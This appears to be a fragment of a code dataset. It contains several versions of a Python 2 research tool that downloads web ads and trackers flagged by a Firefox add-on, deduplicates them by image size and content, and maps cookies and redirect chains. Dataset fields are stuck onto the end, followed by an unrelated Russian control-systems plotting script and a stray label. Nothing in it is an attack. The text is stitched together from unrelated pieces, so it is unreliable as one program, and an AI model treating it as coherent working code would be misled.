1\n\n\ndef get_bug_type(file_type):\n is_ad = False\n bug_type = 'text'\n if file_type.startswith('HTML') or file_type.startswith('ASCII'\n ) or file_type.startswith('UTF-8 Unicode English'\n ) or file_type.startswith('very short'):\n bug_type = 'text'\n elif file_type.endswith('1 x 1') and file_type.startswith('GIF'):\n bug_type = 'gif'\n elif file_type.startswith('PNG'):\n bug_type = 'png'\n is_ad = True\n elif file_type.startswith('GIF'):\n bug_type = 'gif'\n is_ad = True\n elif file_type.startswith('Macromedia Flash'):\n bug_type = 'swf'\n is_ad = True\n elif file_type.startswith('JPEG'):\n bug_type = 'jpg'\n is_ad = True\n return bug_type, is_ad\n\n\ndef parse_buginfo(entry):\n \"\"\"\n Takes the json decoded bug information and inserts it into a WebBug instance\n \"\"\"\n bugname = entry['bug']['name'].replace(' ', '').replace('/', '_')\n bugsrc = entry['ent']['policyContentLocation']\n bugpattern = entry['bug']['pattern']\n try:\n bugaffiliation = entry['bug']['affiliation']\n except KeyError:\n bugaffiliation = ''\n bugtype = entry['bug']['type']\n bugpathname = entry['ent']['pathname']\n return WebBug(name=bugname, src=bugsrc, affiliation=bugaffiliation,\n bug_type=bugtype, matched_pattern=bugpattern, pathname=bugpathname)\n\n\ndef curl_worker_legacy(args):\n output_dir = args[0]\n saved_file_name = args[1]\n path = args[2]\n bug = args[3]\n curl_result_queue = args[4]\n subprocess.call(['wget', '-t', '1', '-q', '-T', '3', '-O', path, bug.\n get_src()])\n subpr_out = subprocess.check_output(['file', '-b', path]).strip()\n filetype, is_ad = get_bug_type(subpr_out)\n if is_ad:\n new_path = os.path.join(output_dir, '%s.%s' % (saved_file_name,\n filetype))\n else:\n new_path = os.path.join(output_dir, 'notad', '%s.%s' % (\n saved_file_name, filetype))\n os.rename(path, new_path)\n bug.set_is_ad(is_ad)\n bug.set_filetype(filetype)\n bug.set_filepath(new_path)\n curl_result_queue.put(bug)\n\n\ndef process_results_legacy(refresh_count, output_dir, ext_queue,\n result_queue, num_of_workers=8):\n \"\"\"\n This function goes through all the bugs identified by the firefox plugin and\n aggregates each bug's occurence in a given page. The aggregation is necessary\n for duplicate ads on the same page\n \"\"\"\n bug_dict = {}\n try:\n os.makedirs(output_dir)\n os.makedirs(os.path.join(output_dir, 'notad'))\n except OSError:\n pass\n curl_worker_pool = Pool(processes=num_of_workers)\n manager = Manager()\n curl_result_queue = manager.Queue()\n dl_counter = 0\n while True:\n try:\n found_bugs = json.loads(ext_queue.get(block=True, timeout=2))\n except Exception:\n LOG.debug('Timing out on get from queue...')\n break\n for entry in found_bugs:\n bugname = entry['bug']['name'].replace(' ', '').replace('/', '_')\n bugsrc = entry['ent']['policyContentLocation']\n bugpattern = entry['bug']['pattern']\n try:\n bugaffiliation = entry['bug']['affiliation']\n except KeyError:\n bugaffiliation = ''\n bugtype = entry['bug']['type']\n bugpathname = entry['ent']['pathname']\n bug = WebBug(name=bugname, src=bugsrc, affiliation=\n bugaffiliation, bug_type=bugtype, matched_pattern=\n bugpattern, pathname=bugpathname)\n try:\n bug_dict[bug] += 1\n continue\n except KeyError:\n bug_dict[bug] = 1\n saved_location = 'Visit%d_%s%d' % (refresh_count, bugname,\n dl_counter)\n dl_counter += 1\n save_to_path = os.path.join(output_dir, '%s' % saved_location)\n obj = curl_worker_pool.apply_async(curl_worker_legacy, ((\n output_dir, saved_location, save_to_path, bug,\n curl_result_queue),))\n try:\n sleep(0.5)\n curl_worker_pool.join()\n curl_worker_pool.close()\n curl_worker_pool.terminate()\n except Exception:\n LOG.debug('Closing pool')\n while not curl_result_queue.empty():\n cbug = curl_result_queue.get()\n bugcount = bug_dict[cbug]\n del bug_dict[cbug]\n bug_dict[cbug] = bugcount\n with open(os.path.join(output_dir, 'bug_dict%d.pkl' % refresh_count), 'w'\n ) as fwtr:\n cPickle.dump(bug_dict, fwtr)\n result_queue.put(bug_dict)\n\n\ndef curl_worker(output_dir, input_queue, worker_output_queue, worker_id,\n ack_queue):\n while True:\n try:\n task = input_queue.get()\n if len(task) == 1 and task[0] == 'STOP':\n LOG.debug('curl_worker %d received stop' % worker_id)\n break\n except Exception:\n LOG.error('Error:')\n saved_file_name = task[0]\n path = task[1]\n bug = task[2]\n try:\n subprocess.call(['wget', '-t', '1', '-q', '-T', '3', '-O', path,\n bug.get_src()])\n subpr_out = subprocess.check_output(['file', '-b', path]).strip()\n except Exception as e:\n LOG.debug('Exception captured %s\\n\\n' % e)\n filetype, is_ad = get_bug_type(subpr_out)\n if is_ad:\n new_path = os.path.join(output_dir, '%s.%s' % (saved_file_name,\n filetype))\n else:\n new_path = os.path.join(output_dir, 'notad', '%s.%s' % (\n saved_file_name, filetype))\n os.rename(path, new_path)\n bug.set_is_ad(is_ad)\n bug.set_filetype(filetype)\n bug.set_filepath(new_path)\n worker_output_queue.put(bug)\n ack_queue.put(worker_id)\n return\n\n\ndef build_nodes(jsonData):\n \"\"\"\n This function takes a JSON encoded output of the firefox addon and builds a\n call graph for the javascript/HTML redirections\n\n @rtype nodes: dict\n @return: A graph of redirection chains\n \"\"\"\n nodes = {}\n\n def _process_cookiestr(cookieStr):\n \"\"\"\n parses a dictionary of req/resp calls to extract the cookie information\n returns a list of cookies set on this domain\n \"\"\"\n cookie_list = []\n for cookie in cookieStr.split('\\n'):\n c = {}\n for cook in cookie.split(';'):\n token = cook.split('=', 1)\n if len(token) < 2:\n continue\n c[token[0]] = token[1]\n cookie_list.append(c)\n return cookie_list\n\n def _check_node(d):\n try:\n domain_node = nodes[d]\n except KeyError:\n isBug, bug_name, bug_type = ADREGEX.search(domain)\n domain_node = WebNode(domain, isBug, bug_name, bug_type)\n nodes[d] = domain_node\n return domain_node\n for domain, dval in jsonData.items():\n domain_node = _check_node(domain)\n cookie_list = []\n for info in dval:\n domainPath = info['domainPath']\n referrerPath = info['referrerPath']\n referrer = info['referrer']\n cookieBool = info['cookie']\n parsed_cookie = None\n if cookieBool:\n cookieStr = info['cookiestr']\n parsed_cookie = _process_cookiestr(cookieStr)\n cookie_list.append(parsed_cookie)\n domain_node.add_reqresp({'domainPath': domainPath, 'referrer':\n referrer, 'referrerPath': referrerPath, 'cookieList':\n parsed_cookie})\n referrer_node = _check_node(referrer)\n referrer_node.add_child(domain_node)\n domain_node.add_parent(referrer_node)\n domain_node.set_cookies(cookie_list)\n return nodes\n\n\ndef filter_results(extQueue, timeout_value, url):\n \"\"\"\n This function takes the JSON output of the firefox addon, and matches the\n request URL against a list of known tracker/ads regexes. \n\n Returns data structure containing request/resp info\n Returns None if did not receive results from FF addon\n \"\"\"\n from Queue import Empty\n try:\n LOG.debug('Timeout value in filter_result :%d' % timeout_value)\n nodes = extQueue.get(True, timeout=timeout_value)\n except Empty as e:\n LOG.info('Did not receive any results from FF plugin for %s' % url)\n nodes = None\n finally:\n while not extQueue.empty():\n extQueue.get()\n return nodes\n\n\ndef process_results(refresh_count, output_dir, ext_queue, result_queue,\n num_of_workers=8):\n \"\"\"\n This function goes through all the bugs identified by the firefox plugin and\n aggregates each bug's occurence in a given page. The aggregation is necessary\n for duplicate ads on the same page\n \"\"\"\n workers_dict = {}\n input_queue = Queue()\n worker_output_queue = Queue()\n ack_queue = Queue()\n bug_dict = {}\n try:\n os.makedirs(output_dir)\n os.makedirs(os.path.join(output_dir, 'notad'))\n except OSError:\n pass\n for i in range(num_of_workers):\n p = Process(target=curl_worker, args=(output_dir, input_queue,\n worker_output_queue, i, ack_queue))\n p.start()\n workers_dict[i] = p\n dl_counter = 0\n while True:\n try:\n found_bugs = json.loads(ext_queue.get(block=True, timeout=2))\n except Exception:\n LOG.debug('No more bugs found, break out of queue')\n break\n for entry in found_bugs:\n bug = parse_buginfo(entry)\n try:\n bug_dict[bug] += 1\n continue\n except KeyError:\n bug_dict[bug] = 1\n try:\n saved_location = 'Visit%d_%s%d' % (refresh_count, bug.\n get_name(), dl_counter)\n dl_counter += 1\n save_to_path = os.path.join(output_dir, '%s' % saved_location)\n input_queue.put((saved_location, save_to_path, bug))\n except Exception as e:\n LOG.exception('%s' % e)\n for i in range(num_of_workers):\n input_queue.put(('STOP',))\n stopped = 0\n while stopped < len(workers_dict):\n ack = ack_queue.get()\n p = workers_dict[ack]\n p.join(timeout=1)\n if p.is_alive():\n p.terminate()\n LOG.debug('terminating process %d' % ack)\n stopped += 1\n while not worker_output_queue.empty():\n cbug = worker_output_queue.get()\n bugcount = bug_dict[cbug]\n del bug_dict[cbug]\n bug_dict[cbug] = bugcount\n with open(os.path.join(output_dir, 'bug_dict%d.pkl' % refresh_count), 'w'\n ) as fwtr:\n cPickle.dump(bug_dict, fwtr)\n result_queue.put(bug_dict)\n return\n", "step-5": "from time import sleep\nfrom uuid import uuid1\nfrom pprint import pprint\nfrom shutil import copy2\nfrom multiprocessing import Process, Queue, Pool, Manager\nfrom ad_grabber_classes import *\nfrom adregex import *\nfrom pygraph.classes.digraph import digraph\n\nimport os\nimport json\nimport jsonpickle\nimport subprocess\nimport cPickle\nimport logging\nLOG = logging.getLogger(\"logAdGrabber\")\nADREGEX = AdRegEx()\n\ndef check_duplicate(fp1, fp2):\n \"\"\"takes two files, does a diff on them, returns True if same\"\"\"\n try:\n subprocess.check_output(['diff', fp1, fp2])\n return True\n except subprocess.CalledProcessError:\n return False\n\ndef identify_uniq_ads(session_results):\n \"\"\"\n i) Identify duplicate ads\n ii) bin the ads by their dimensions\n iii) Keep track of the test sites and have many times they have displayed this\n ad\n \"\"\"\n # bin by dimensions\n ads = {}\n notads = {}\n swf_bin = {}\n img_bin = {}\n error_bugs = []\n for train_category, cat_dict in session_results.items():\n for test_site, bug_dict_list in cat_dict.items():\n for index_count in range(len(bug_dict_list)):\n bug_dict = bug_dict_list[index_count] \n for bug, bug_count in bug_dict.items():\n bug_filetype = bug.get_filetype()\n bug_filepath = bug.get_filepath()\n if bug_filepath == '':\n #LOG.debug('did not manage to curl the scripts for bug:%s' % bug)\n error_bugs.append(bug)\n continue\n\n if bug.is_ad(): # give zerofucks to non-ads\n height = '999'\n width = '999'\n if bug_filetype == 'swf':\n # choose from the swf media bin\n target_bin = swf_bin\n try:\n width = subprocess.check_output(['swfdump', '-X',\n bug_filepath]).split(' ')[-1].strip()\n height = subprocess.check_output(['swfdump', '-Y',\n bug_filepath]).split(' ')[-1].strip()\n except subprocess.CalledProcessError :\n LOG.exception(\"swfdump error on file %s\" % bug_filepath)\n else:\n # choose from the img media bin\n target_bin = img_bin\n LOG.debug(bug_filepath)\n try:\n height = subprocess.check_output(['identify', '-format', '\"%h\"',\\\n bug_filepath]).strip()\n width = subprocess.check_output(['identify', '-format','\"%w\"',\\\n bug_filepath]).strip()\n except subprocess.CalledProcessError:\n LOG.exception(\"identify error on file %s\" % bug_filepath)\n\n try:\n bug.set_dimension(height, width)\n dimension = '%s-%s' % (height, width)\n # check all the images in the bin with the dimensions\n m_list = target_bin[dimension]\n dup = None\n for m in m_list:\n if check_duplicate(bug_filepath, m.get_filepath()): \n dup = m\n break\n if dup:\n # check if the duplicate ad came from a different test site\n if test_site in ads[dup]:\n ads[dup][test_site] += bug_count\n else :\n ads[dup] = {test_site : bug_count}\n # delete old bug reference, add new one and point to duplicated\n # bug\n del bug_dict[bug]\n bug_dict[dup] = bug_count\n\n else: \n target_bin[dimension].append(bug)\n ads[bug] = {test_site : bug_count}\n # tally up the results\n except KeyError: # The bin hasn't been created\n target_bin[dimension] = [bug]\n ads[bug] = {test_site : bug_count}\n # else:\n # notads\n\n return ads,error_bugs\n\n\ndef export_uniq_ads(ads, out_folder, rel_folder):\n \"\"\"\n Takes all the uniq ads seen in this session and writes its metadata\n information to a csv file\n \"\"\"\n try :\n os.makedirs(out_folder)\n os.makedirs(os.path.join(out_folder, rel_folder))\n except OSError:\n LOG.debug('Creating output folder')\n\n fwtr = open(os.path.join(out_folder, 'uniq_ads.csv'), 'w')\n # Relative location = Location of the ad within this current session\n # Global location, added when an ad is matched with existing ads in DB\n fwtr.write('#UID, Ad-Company, Ad-Filetype, Height, Width, Rel-Location, src\\n')\n \n for bug in ads.keys():\n height, width = bug.get_dimension()\n filepath = bug.get_filepath()\n name = bug.get_name()\n src = bug.get_src()\n filetype = bug.get_filetype()\n new_uuidname = '%s.%s' % (uuid1(), filetype)\n bug.set_uuid(new_uuidname)\n new_filepath = os.path.join(out_folder, new_uuidname)\n rel_filepath = os.path.join(rel_folder, new_uuidname)\n copy2(filepath, new_filepath)\n fwtr.write('{0}, {1}, {2}, {3}, {4}, {5}, {6}\\n'.format(new_uuidname,\n name, filetype, height, width, rel_filepath, src))\n fwtr.close()\n return ads\n\ndef write_run_info(RUNINFO_DIR, session_date):\n # write to a file in runinfo_dir to tell automation script this run is done\n fp = os.path.join(RUNINFO_DIR, '%s.info' % session_date)\n with open(fp, 'w') as fwtr:\n fwtr.write('OK')\n\ndef write_session_info(vmid, machineid, profile, session_date, train_mode, training_sites,\n test_sites, num_of_refresh, export_folder):\n train_category = training_sites.keys()[0]\n train_sites_to_visit = training_sites[train_category]\n with open(os.path.join(export_folder, 'session_info.csv'), 'w') as fwtr:\n fwtr.write('session_str : %s\\n' % session_date) \n fwtr.write('machine_info : %s\\n' % machineid)\n fwtr.write('vmid : %s\\n' % vmid)\n fwtr.write('profile : %s\\n' % profile)\n fwtr.write('train_mode : %s\\n' % train_mode)\n fwtr.write('num_of_refresh : %d\\n' % num_of_refresh)\n fwtr.write('training_topic : %s\\n' % train_category)\n fwtr.write('training_sites : ')\n for site in train_sites_to_visit:\n fwtr.write('%s, ' % site)\n fwtr.write('\\nnum_of_train_sites : %d\\n' % len(train_sites_to_visit))\n fwtr.write('test_sites : ')\n for site in test_sites: \n fwtr.write('%s, ' % site[1])\n fwtr.write('\\nnum_of_test_sites : %d\\n' % len(test_sites))\n\n\ndef generate_stats(results, ads, vmid, session_date, export_folder, process_ex_time):\n \"\"\"\n Generates stats on\n - uniq ads seen on the test sites\n - total number of ads seen on the test sites\n - total number of ads seen on all test sites\n - total number of uniq ads seen on all test sites\n \"\"\"\n try:\n os.makedirs(export_folder)\n except OSError:\n pass\n\n # to be read and inserted into db\n totalads = 0 # total number of ads seen during this session\n totaluniqads = len(ads) # does not support multicategories at this point\n\n # for each category, for each test site, count total number of ads seen\n totalad_category = {} \n # for each category, for each test site, count total number of uniq ads seen\n uniqad_category = {}\n \n with open(os.path.join(export_folder, 'session_bugs.csv'), 'w') as bugs_wtr:\n bugs_wtr.write('#Ad-UID, Website-URL, Refresh-Num, Training-Topic,\\\n Site-Context, BugCount, BugSrc\\n')\n for train_category, cat_dict in results.items():\n totalad_category[train_category] = {}\n uniqad_category[train_category] = {}\n for test_site, bug_dict_list in cat_dict.items():\n total_ads = 0 # for each site\n uniq_ads = [] # for each site\n for refresh_num in range(len(bug_dict_list)):\n bug_dict = bug_dict_list[refresh_num]\n for bug, bugcount in bug_dict.items():\n if bug.is_ad():\n uuid = bug.get_uuid()\n bugs_wtr.write('{0}, {1}, {2}, {3}, {4}, {5}, {6}\\n'.format(uuid, test_site,\n refresh_num, train_category, 'N/A', bugcount, bug.get_src()))\n total_ads += bugcount\n if bug not in uniq_ads:\n uniq_ads.append(bug)\n totalad_category[train_category][test_site] = total_ads\n uniqad_category[train_category][test_site] = len(uniq_ads)\n totalads += total_ads # global count for total ads\n\n with open(os.path.join(export_folder, 'session_stats.csv'), 'w') as ses_wtr:\n # write some metadata information about this session\n ses_wtr.write('#VMID: %s\\n' % vmid)\n ses_wtr.write('#Session-Date: %s\\n' % session_date)\n ses_wtr.write('#Time to complete: %s\\n' % process_ex_time)\n ses_wtr.write('#Training Categories: %s\\n' % str(results.keys()))\n ses_wtr.write('#Total Number of ads: %d\\n' % totalads)\n ses_wtr.write('#Total Uniq ads: %d\\n\\n' % totaluniqads)\n ses_wtr.write('#TrainingTopic, Test-Site, NumberOfVisit, TotalAds, UniqAds\\n')\n\n for train_category, cat_dict in results.items(): \n for test_site, bug_dict_list in cat_dict.items():\n num_of_visit = len(bug_dict_list)\n ses_wtr.write('{0}, {1}, {2}, {3}, {4}\\n'.format(train_category,\n test_site, num_of_visit, totalad_category[train_category][test_site],\n uniqad_category[train_category][test_site]))\n\n\ndef export_ads(results,out_folder):\n \"\"\"\n This function creates a csv file which contains all the unique ads seen in\n each test site (including all the refreshes)\n\n TODO update the doc\n results is a dictionary of the following\n results = { Category : Value, ... }\n value = { test_site_url : [ result1, result2, ... resultN], ... }\n resultN : { WebBug : count, ... }\n \"\"\"\n try:\n os.makedirs(out_folder)\n except OSError:\n LOG.debug('Creating output file folder ...')\n \n export_ad_counter = 1 # assign unique number to ads for export to mturk\n #short_listed_companies = ['google adsense', 'doubleclick']\n with open(os.path.join(out_folder,'ad_labelling.csv'), 'w') as fwtr:\n # write the titles\n fwtr.write('#{0}, {1}, {2}, {3}, {4}, {5}, {6}, {7}, {8}, {9}\\n'.format(\\\n 'Ad#', 'Company', 'FileType', 'Ad-Category', 'Website-URL',\\\n 'Refresh-Num','Training-Topic', 'Context-of-site', 'Total', 'Ad-src'))\n # make sure we only add one ad\n for train_category, cat_dict in results.items():\n for test_site, bug_dict_list in cat_dict.items():\n for refresh_num in range(len(bug_dict_list)):\n bug_dict = bug_dict_list[refresh_num]\n for bug, bugcount in bug_dict.items():\n if not bug.is_ad():\n #TODO check bug_type in ffext\n continue\n if bug.get_filetype() in ['swf', 'png', 'gif', 'jpg']:\n file_name = '%d.%s' % (export_ad_counter, bug.get_filetype())\n new_location = os.path.join(out_folder, file_name)\n copy2(bug.get_filepath(), new_location)\n fwtr.write('{0}, {1}, {2}, {3}, {4}, {5}, {6}, {7} , {8}, {9},\\\n \\n'.format(file_name, bug.get_name(), bug.get_filetype(),\n '' ,test_site, refresh_num, train_category, 'N/A', bugcount,\n bug.get_src()))\n export_ad_counter += 1\n\n\ndef get_bug_type(file_type):\n is_ad = False\n bug_type = 'text'\n if file_type.startswith('HTML') or \\\n file_type.startswith('ASCII') or \\\n file_type.startswith('UTF-8 Unicode English') or \\\n file_type.startswith('very short') :\n bug_type = 'text'\n elif (file_type.endswith('1 x 1') and file_type.startswith('GIF')): \n bug_type = 'gif'\n elif file_type.startswith('PNG'):\n bug_type = 'png'\n is_ad = True\n elif file_type.startswith('GIF'):\n bug_type = 'gif'\n is_ad = True\n elif file_type.startswith('Macromedia Flash'):\n bug_type = 'swf'\n is_ad = True\n elif file_type.startswith('JPEG'):\n bug_type = 'jpg'\n is_ad = True\n return bug_type, is_ad\n\n\ndef parse_buginfo(entry):\n \"\"\"\n Takes the json decoded bug information and inserts it into a WebBug instance\n \"\"\"\n bugname = entry['bug']['name'].replace(' ','').replace('/','_')\n bugsrc = entry['ent']['policyContentLocation']\n bugpattern = entry['bug']['pattern']\n try :\n bugaffiliation = entry['bug']['affiliation']\n except KeyError:\n bugaffiliation = \"\"\n bugtype = entry['bug']['type']\n bugpathname = entry['ent']['pathname']\n return WebBug(name=bugname, src=bugsrc, affiliation=bugaffiliation,\n bug_type=bugtype, matched_pattern=bugpattern, pathname=bugpathname)\n\ndef curl_worker_legacy(args):\n output_dir = args[0]\n saved_file_name = args[1]\n path = args[2]\n bug = args[3]\n curl_result_queue = args[4]\n\n # subprocess.call(['curl', '-o', path , bug.get_src() ])\n subprocess.call(['wget', '-t', '1', '-q', '-T', '3', '-O', path , bug.get_src()])\n # Use the unix tool 'file' to check filetype\n subpr_out = subprocess.check_output(['file', '-b', path]).strip()\n filetype, is_ad = get_bug_type(subpr_out)\n\n if is_ad:\n new_path = os.path.join(output_dir, '%s.%s' % (saved_file_name, filetype))\n else:\n new_path = os.path.join(output_dir, 'notad', '%s.%s' % (saved_file_name,\\\n filetype))\n os.rename(path, new_path)\n bug.set_is_ad(is_ad)\n bug.set_filetype(filetype)\n bug.set_filepath(new_path)\n curl_result_queue.put(bug)\n\ndef process_results_legacy(refresh_count, output_dir, ext_queue, result_queue,\\\n num_of_workers=8):\n \"\"\"\n This function goes through all the bugs identified by the firefox plugin and\n aggregates each bug's occurence in a given page. The aggregation is necessary\n for duplicate ads on the same page\n \"\"\"\n bug_dict = {} # dict to keep track of how many duplicates of each bug, if\n # exists\n try:\n # separate the non-ads from the ads for ease of handchecking\n os.makedirs(output_dir)\n os.makedirs(os.path.join(output_dir, 'notad'))\n except OSError:\n pass\n\n # uses a pool of 'curl' workers\n curl_worker_pool = Pool(processes=num_of_workers)\n manager = Manager()\n curl_result_queue = manager.Queue()\n \n dl_counter = 0 # keep track of how many bugs downloaded\n while True:\n try:\n found_bugs = json.loads(ext_queue.get(block=True, timeout=2))\n except Exception:\n LOG.debug('Timing out on get from queue...')\n break\n for entry in found_bugs:\n bugname = entry['bug']['name'].replace(' ','').replace('/','_')\n bugsrc = entry['ent']['policyContentLocation']\n bugpattern = entry['bug']['pattern']\n try :\n bugaffiliation = entry['bug']['affiliation']\n except KeyError:\n bugaffiliation = \"\"\n bugtype = entry['bug']['type']\n bugpathname = entry['ent']['pathname']\n bug = WebBug(name=bugname, src=bugsrc, affiliation=bugaffiliation,\n bug_type=bugtype, matched_pattern=bugpattern, pathname=bugpathname)\n try:\n # matched an entry in the bugdict, incr count and continue\n bug_dict[bug] += 1\n continue\n except KeyError:\n bug_dict[bug] = 1 \n\n saved_location ='Visit%d_%s%d' % (refresh_count, bugname,\\\n dl_counter)\n dl_counter += 1\n save_to_path = os.path.join( output_dir, '%s' % saved_location)\n obj = curl_worker_pool.apply_async(curl_worker_legacy, \\\n ((output_dir, saved_location, save_to_path, bug, curl_result_queue),))\n try:\n sleep(0.5)\n curl_worker_pool.join()\n curl_worker_pool.close()\n curl_worker_pool.terminate()\n except Exception:\n LOG.debug('Closing pool')\n\n while not curl_result_queue.empty():\n cbug = curl_result_queue.get()\n # ugly code here\n bugcount = bug_dict[cbug]\n del bug_dict[cbug]\n bug_dict[cbug] = bugcount\n with open( os.path.join(output_dir, 'bug_dict%d.pkl' % refresh_count), 'w') as fwtr:\n cPickle.dump(bug_dict, fwtr)\n result_queue.put(bug_dict)\n\n\ndef curl_worker(output_dir, input_queue, worker_output_queue, worker_id,\\\n ack_queue):\n while True:\n try: \n task = input_queue.get()\n if len(task) == 1 and task[0] == \"STOP\":\n LOG.debug('curl_worker %d received stop' % worker_id)\n break\n except Exception:\n LOG.error('Error:')\n #LOG.debug(task)\n\n saved_file_name = task[0]\n path = task[1]\n bug = task[2]\n \n try:\n # subprocess.call(['curl', '-o', path , bug.get_src()])\n subprocess.call(['wget', '-t', '1', '-q', '-T', '3', '-O', path , bug.get_src()])\n subpr_out = subprocess.check_output(['file', '-b', path]).strip()\n except Exception as e : \n LOG.debug('Exception captured %s\\n\\n' % e)\n\n filetype, is_ad = get_bug_type(subpr_out)\n if is_ad:\n new_path = os.path.join(output_dir, '%s.%s' % (saved_file_name, filetype))\n else:\n new_path = os.path.join(output_dir, 'notad', '%s.%s' % (saved_file_name,\\\n filetype))\n os.rename(path, new_path)\n bug.set_is_ad(is_ad)\n bug.set_filetype(filetype)\n bug.set_filepath(new_path)\n worker_output_queue.put(bug)\n ack_queue.put(worker_id)\n return \n\n\ndef build_nodes(jsonData):\n \"\"\"\n This function takes a JSON encoded output of the firefox addon and builds a\n call graph for the javascript/HTML redirections\n\n @rtype nodes: dict\n @return: A graph of redirection chains\n \"\"\"\n nodes = {}\n\n def _process_cookiestr(cookieStr):\n \"\"\"\n parses a dictionary of req/resp calls to extract the cookie information\n returns a list of cookies set on this domain\n \"\"\"\n cookie_list = []\n # parses cookie str if a cookie has been set\n for cookie in cookieStr.split('\\n'):\n c = {}\n for cook in cookie.split(';'):\n token = cook.split('=', 1)\n if len(token) < 2: \n # usually this is just a flag e.g HTTPOnly, HTTPSOnly\n continue\n c[token[0]] = token[1]\n cookie_list.append(c)\n return cookie_list \n \n def _check_node(d):\n try:\n domain_node = nodes[d]\n except KeyError:\n isBug, bug_name, bug_type = ADREGEX.search(domain)\n domain_node = WebNode(domain, isBug, bug_name, bug_type)\n nodes[d] = domain_node\n return domain_node \n \n #jsonData contains all the domains and all the req/resp pairs made to them\n #iterating over the domains first\n for domain, dval in jsonData.items():\n # but first check if a node for this domain has been created or not\n domain_node = _check_node(domain)\n cookie_list = []\n # iterating thru all the req/resp pairs on a domain\n for info in dval:\n domainPath = info['domainPath']\n referrerPath = info['referrerPath']\n referrer = info['referrer']\n cookieBool = info['cookie'] \n \n parsed_cookie = None \n if cookieBool:\n cookieStr = info['cookiestr']\n parsed_cookie = _process_cookiestr(cookieStr)\n cookie_list.append(parsed_cookie)\n domain_node.add_reqresp({'domainPath' : domainPath,\n 'referrer' : referrer,\n 'referrerPath' : referrerPath,\n 'cookieList' : parsed_cookie\n })\n # making sure that we also create the node for the referrer\n referrer_node = _check_node(referrer)\n referrer_node.add_child(domain_node)\n domain_node.add_parent(referrer_node)\n domain_node.set_cookies(cookie_list)\n return nodes\n\n\ndef filter_results(extQueue, timeout_value, url):\n \"\"\"\n This function takes the JSON output of the firefox addon, and matches the\n request URL against a list of known tracker/ads regexes. \n\n Returns data structure containing request/resp info\n Returns None if did not receive results from FF addon\n \"\"\"\n from Queue import Empty\n try:\n LOG.debug('Timeout value in filter_result :%d' % timeout_value)\n nodes = extQueue.get(True, timeout=timeout_value)\n \n except Empty as e:\n LOG.info('Did not receive any results from FF plugin for %s' % url)\n nodes = None\n finally:\n while not extQueue.empty():\n extQueue.get()\n return nodes\n\ndef process_results(refresh_count, output_dir, ext_queue, result_queue,\n num_of_workers=8):\n \"\"\"\n This function goes through all the bugs identified by the firefox plugin and\n aggregates each bug's occurence in a given page. The aggregation is necessary\n for duplicate ads on the same page\n \"\"\"\n workers_dict = {} # keep track of worker processes\n input_queue = Queue() # asynchronously feed workers task to do \n worker_output_queue = Queue() # output queue from workers\n ack_queue = Queue()\n bug_dict = {} # dict to keep track of how many duplicates of each bug, if\n # exists\n try:\n # separate the non-ads from the ads for ease of handchecking\n os.makedirs(output_dir)\n os.makedirs(os.path.join(output_dir, 'notad'))\n except OSError:\n # Directory is created, Okay to pass\n pass\n\n for i in range(num_of_workers):\n p = Process(target=curl_worker, args=(output_dir, input_queue,\\\n worker_output_queue, i, ack_queue))\n p.start()\n workers_dict[i] = p\n # uses a pool nodesurl' workers\n # curl_worker_pool = Pool(processes=8)\n # manager = Manager()\n # curl_result_queue = manager.Queue()\n \n dl_counter = 0 # keep track of how many bugs downloaded\n while True:\n try:\n found_bugs = json.loads(ext_queue.get(block=True, timeout=2))\n except Exception:\n LOG.debug('No more bugs found, break out of queue')\n break\n\n for entry in found_bugs:\n bug = parse_buginfo(entry)\n try:\n # matched an entry in the bugdict, incr count and continue\n bug_dict[bug] += 1\n continue\n except KeyError:\n bug_dict[bug] = 1 \n\n try:\n saved_location ='Visit%d_%s%d' % (refresh_count, bug.get_name(), dl_counter)\n dl_counter += 1\n save_to_path = os.path.join( output_dir, '%s' % saved_location)\n input_queue.put((saved_location, save_to_path, bug))\n except Exception as e:\n LOG.exception('%s' % e)\n\n for i in range(num_of_workers):\n # send stop signal\n input_queue.put((\"STOP\",))\n \n stopped = 0\n while stopped < len(workers_dict):\n ack = ack_queue.get()\n p = workers_dict[ack]\n p.join(timeout=1)\n if p.is_alive():\n p.terminate()\n LOG.debug('terminating process %d' % ack)\n stopped += 1\n \n while not worker_output_queue.empty():\n # receive results from the worker\n cbug = worker_output_queue.get()\n # ugly code here\n bugcount = bug_dict[cbug]\n del bug_dict[cbug]\n bug_dict[cbug] = bugcount\n\n with open( os.path.join(output_dir, 'bug_dict%d.pkl' % refresh_count), 'w') as fwtr:\n cPickle.dump(bug_dict, fwtr)\n result_queue.put(bug_dict)\n return\n\n\n \n\n", "step-ids": [ 10, 14, 15, 16, 18 ] }
[ 10, 14, 15, 16, 18 ]
import control.matlab as ctrl import matplotlib.pylab as plt def process_data(num11, den11, num21, den21): w11 = ctrl.tf(num11, den11) w21 = ctrl.tf(num21, den21) print('результат w11={} w21={}'.format(w11, w21)) TimeLine = [] for i in range (1, 3000): TimeLine.append(i/1000) plt.figure(0, figsize = [7, 6]) [y11, x11] = ctrl.step(w11, TimeLine) [y21, x21] = ctrl.step(w21, TimeLine) plt.plot(x11, y11, "r", label='Исходная') plt.plot(x21, y21, "b", label='Увеличенная k и уменшенная Т') plt.title('Переходная функция звена') plt.ylabel('Амплитуда') plt.xlabel('Время(с)') plt.grid(True) plt.show() [y11, x11] = ctrl.impulse(w11, TimeLine) [y21, x21] = ctrl.impulse(w21, TimeLine) plt.plot(x11, y11, "r", label='Исходная') plt.plot(x21, y21, "b", label='Увеличенная k и уменшенная Т') plt.title('Импульсная функция звена') plt.ylabel('Амплитуда') plt.xlabel('Время(с)') plt.grid(True) plt.show() ctrl.mag, ctrl.phase, ctrl.omega = ctrl.bode(w11, w21, dB=False) plt.plot() plt.show() return w11, w21 print('1 - безынерционное звено') print('2 - апериодическое звено') print('3 - интегрирующее звено') print('4 - идеальное дифференцирующее звено') print('5 - реально дифференцирующее звено') print('Введите номер функции, которую необходимо отобразить:') func_number = int(input()) if func_number == 1: process_data([4.], [ 1.], [2.], [ 1.]) elif func_number == 2: process_data([3.], [2, 1.], [1.5, 0.], [4, 1.]) elif func_number == 3: process_data([1.], [1, 0.], [1.], [0.5, 0.]) elif func_number == 4: process_data([5, 0.], [1e-12, 1.], [10, 0.], [1e-12, 1.]) elif func_number == 5: process_data([3.], [1, 1.], [1.5, 0.], [2, 1.])
normal
